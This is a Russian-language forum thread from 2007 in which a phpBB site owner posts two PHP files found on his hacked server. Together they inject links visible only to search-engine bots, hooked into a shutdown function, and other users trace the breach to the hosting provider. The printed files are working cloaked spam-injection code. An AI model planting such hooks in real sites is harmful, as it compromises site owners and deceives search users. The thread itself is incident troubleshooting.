Взлом. Опять инфобокс. И не только...

MaxiStyle · Сообщение **MaxiStyle** » 02.04.2007 11:36

Совершенно случайно на серваке нашёл папку userbin, лежащую на уровень выше корня каталога. Со следующим содержанием.
incldya.php

Код: Выделить всё

<?
$refer=$_SERVER['HTTP_REFERER'];
$refer=strtolower($refer);
if ((strpos($refer, "http") === false))
{
define("LINKS","readme.txt");
if (preg_match('/(?:StackRambler|Yandex[^\)]+[^M]\)|Aport)/i', $_SERVER['HTTP_USER_AGENT'])) {
$data6 = @file (LINKS, $use_include_path = 1);
} else { //if !bot
unset ($data6);
}
$tot23 = @count($data6);
if ($tot23<5) { 
$_otp =" "; 
} else {
srand((float)microtime() * 1000000);
if (IsSet($data6)) {
shuffle($data6);
foreach ($data6 as $link) {
$_otp .= trim($link)."\r\n";
if ($cnt++>5) break;
}// foreach-1
}// if IsSet
$cnt = 0;
}//if <50
}//if refer
echo $_otp;
?>

inj.php

Код: Выделить всё

<?
	global $__inject_level;
	if (empty($__inject_level)) 
	{
		function __inject_shutdown()
		{
			include 'incldya.php';
			flush();
		}

		function __inject_print_sign()
		{
			echo "82347badsh33";
			flush();
		}

		$__inject_level = 1;
		if ($_SERVER['HTTP_USER_AGENT'] != "TeleportPro")
			register_shutdown_function("__inject_shutdown");
		else
			register_shutdown_function("__inject_print_sign");
	}
?>

Решил, что куски какого-то мода. Удалил папку. И что вы думаете... форум выдал ошибку, оказываеться скрипт inj.php подключаеться через следующие скрипты:
config.php
constants.php
album_constants.php
template.php
sessions.php
и ещё с 10 скриптов!

Помогите, разобраться как меня хакнули. Версия форума 2.0.22, обновлял вовремя.
Похожая проблема описана так же здесь http://yarportal.ru/topic21938.html но там народ нисчем не разобрался.

Сообщение **Xpert** » 02.04.2007 11:50

В случае если обновлялись вовремя и вас не взломали раньше, это не phpBB. Для 2.0.22 не существует уязвимостей.

readme.txt приложите пожалуйста (через полную форму ответа).

MaxiStyle · Сообщение **MaxiStyle** » 03.04.2007 2:46

Xpert
readme.txt не существует в том то и загвоздка, что код практически бессмысленный, а подобная фигня не у меня одного, в инете я натолкнулся на похожие случаи у народа...но никто не знает в чём дело.
Похоже, что уязвимость в модах, а не в форуме...

Сообщение **Xpert** » 03.04.2007 7:07

Очень может быть...
Можно полный список модов?

MaxiStyle · Сообщение **MaxiStyle** » 03.04.2007 15:14

Xpert
Да конечно:
Advanced Posts Merging 2.1.2
Admin Userlist 1.1.0
Advanced ACP 1.0.0
Photo Album v2 for phpBB2
Anti Bot Question MOD 2.0.1
File Attachment Mod v2
Birthday 1.5.8
Detector Bots 2.0.6
Extended Quick Reply Form 2.3.0
eXtreme Styles mod 2.3.1
First Post On Every Page 1.0.1
Gender 1.2.7
Moderator Ban 1.2.0
Recent Topics 1.0.4

в общем-то и всё...
проверил логи сервака, ничего не нашёл.
с самого сайта такое врядли тоже могли устроить, движок самописный, да и к тому же сам факт того, что я не один такой похаканый уже настораживает!
И всем советую поискать у себя на серваке заветную папочку userbin.

Сообщение **Xpert** » 03.04.2007 15:31

Конкретные версии модов в студию для вот этих

MaxiStyle писал(а):Photo Album v2 for phpBB2
File Attachment Mod v2

MaxiStyle · Сообщение **MaxiStyle** » 04.04.2007 5:37

Photo Album 2.0.53
File Attachment Mod 2.3.9

edgar · Сообщение **edgar** » 04.04.2007 6:38

Да по ходу это не через phpbb ломают...

*****
тут были примеры взломанных сайтов. удалены.

*****

Посмотрите сколько в кэше гугла и яндекса сайтов с ошибками из-за inj.php и incldya.php в userbin. Полно таких
Cайты без phpbb
Может хостера какого ломанули... (вашего в смысле)

Добавлено спустя 21 минуту 57 секунд:

Все сайты на серваке infobox.org
MaxiStyle ваш тоже

Уязвимость phpbb млин. Ф топку

MaxiStyle · Сообщение **MaxiStyle** » 05.04.2007 3:36

Очень интересно.
Я 3 дня назад тоже долбил поисковика, тогда они ничего не нашли, а сегодня попробовал и к списку взломаных добавилось ещё пару сайтов... они все с Инфобокса... буду долбит суппорт.
Спасибо.

natali · Сообщение **natali** » 05.04.2007 17:36

называйте топик по людски млять

я подумал что в phpBB уязвимость

неужели трудно написать "МЕНЯ хакнули".

MaxiStyle · Сообщение **MaxiStyle** » 06.04.2007 5:05

natali писал(а):я подумал что в phpBB уязвимость

ну я ведь тоже так думал!

В общем похоже Инфобокс похакали. Я уже около 20 сайтов похаканых нашёл... Суппорт отписываеться якобы сами мы ламеры...
Тему можно закрывать.

edgar · Сообщение **edgar** » 06.04.2007 8:08

MaxiStyle писал(а):Тему можно закрывать.

Зачем это ее закрывать? Нормальная тема вроде, полезна может быть не только вам и вполне возможно продолжение

Только не понимаю, почему вы не исправляете ее название. Название точно не по теме

Sklaz3r · Сообщение **Sklaz3r** » 06.04.2007 9:36

Просто хостера хакнули.
Знакомая проблема...
Сначала <iframe>'ы, потом файлы...

MaxiStyle · Сообщение **MaxiStyle** » 07.04.2007 2:56

Хостер божиться, что непричём, хотя подтверждает, что взломаны именно его клиенты (по их словам менее 1%). Рекомендует мне провериться на наличие троянов.
Ну включил я AVP5 сканер, ну нихрена он не нашёл (базы новые)...

Вечная проблема: кто виноват и что с этим делать...

Alexalexis · Сообщение **Alexalexis** » 07.04.2007 15:20

MaxiStyle писал(а):Хостер божиться, что непричём, хотя подтверждает, что взломаны именно его клиенты (по их словам менее 1%).
...
Вечная проблема: кто виноват и что с этим делать...

Выводы. :wink: